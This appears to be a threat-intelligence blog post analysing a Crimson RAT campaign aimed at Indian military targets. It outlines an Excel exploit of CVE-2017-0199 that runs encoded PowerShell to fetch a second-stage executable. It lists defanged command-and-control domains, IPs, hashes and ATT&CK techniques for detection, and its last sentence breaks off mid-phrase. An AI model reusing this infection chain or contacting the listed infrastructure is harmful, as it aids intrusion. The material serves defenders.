Crimson RAT was previously used by Pakistani Threat Actors Transparent Tribe
Crowdstrike has been tracking the Threat Actor by name MYTHIC LEOPARD since 2016. According to the blog, MYTHIC LEOPARD is Pakistan-based adversary with operations likely located in Karachi. This adversary uses social engineering and spear phishing to target Indian military and defense entities with Crimson RAT. FireEye tracks similar threat actor named APT36 AKA Lapis, Pakistani based Cyber Espionage group that supports Pakistani military and diplomatic interests targeting Indian Military and government with malware named SeedDoor.
There were very few samples uploaded to the public malware repositories from June 2018 to Jan 2020. From mid January, quite a few samples triggered the Yara Rules created to track the operation.
Analysis:
One Such sample that hit the custom Yara rule was 69d4883858b44f0c41ba68493c389885, submitted on Jan 23, 2020 from German IP(Maybe VPN).
The file is malicious Microsoft Office Excel documents that leverage CVE-2017–0199 vulnerability. This vulnerability allows a malicious actor to download and execute a Visual Basic script containing PowerShell commands when a user opens a document containing an embedded exploit.
Excel document runs the Base64 Encoded PowerShell Script.
The Decoded PowerShell scripts show the URL contacted to download and executed the Second Stage payload.
The Executable establishes communication through unusual port 2987.
Process flow:
- Excel file leverages CVE-2017–0199 vulnerability to run powerShell script.
- PowerShell script downloads executable from newsupdates[.]myftp[.]org.
- Executable connects to bjorn111[.]duckdns[.]org.
- Threat is identified as Crimson RAT (ETPRO TROJAN MSIL/Crimson Receiving Command)
IoAs:
- Execution: T1203 — Exploitation for Client Execution (CVE-2017–0199)
- Execution: T1086 — PowerShell
- Discovery: T1012 — Query Registry
- Command and Control: T1105 — Remote File Copy
- Command and Control: T1065 — Uncommonly Used Port (2987)
IoCs:
Hash
- 6e0ba1b2e72d9a0682d1cdd27eea3980da04582bdef0080bf22f8809d172e229 (Downloader -Excel)
- d27474625cdc0c3456918edfa58bfaf910c8b98c6168a506ac14afc1a41fb58f (Dropped executable)
Domain
- newsupdates[.]myftp[.]org
- bjorn111[.]duckdns[.]org
IP
- 108[.]62[.]12[.]134
- 160[.]20[.]147[.]59
The return of the Crimson RAT in malware repositories might be due to some operations observed in the wild using.
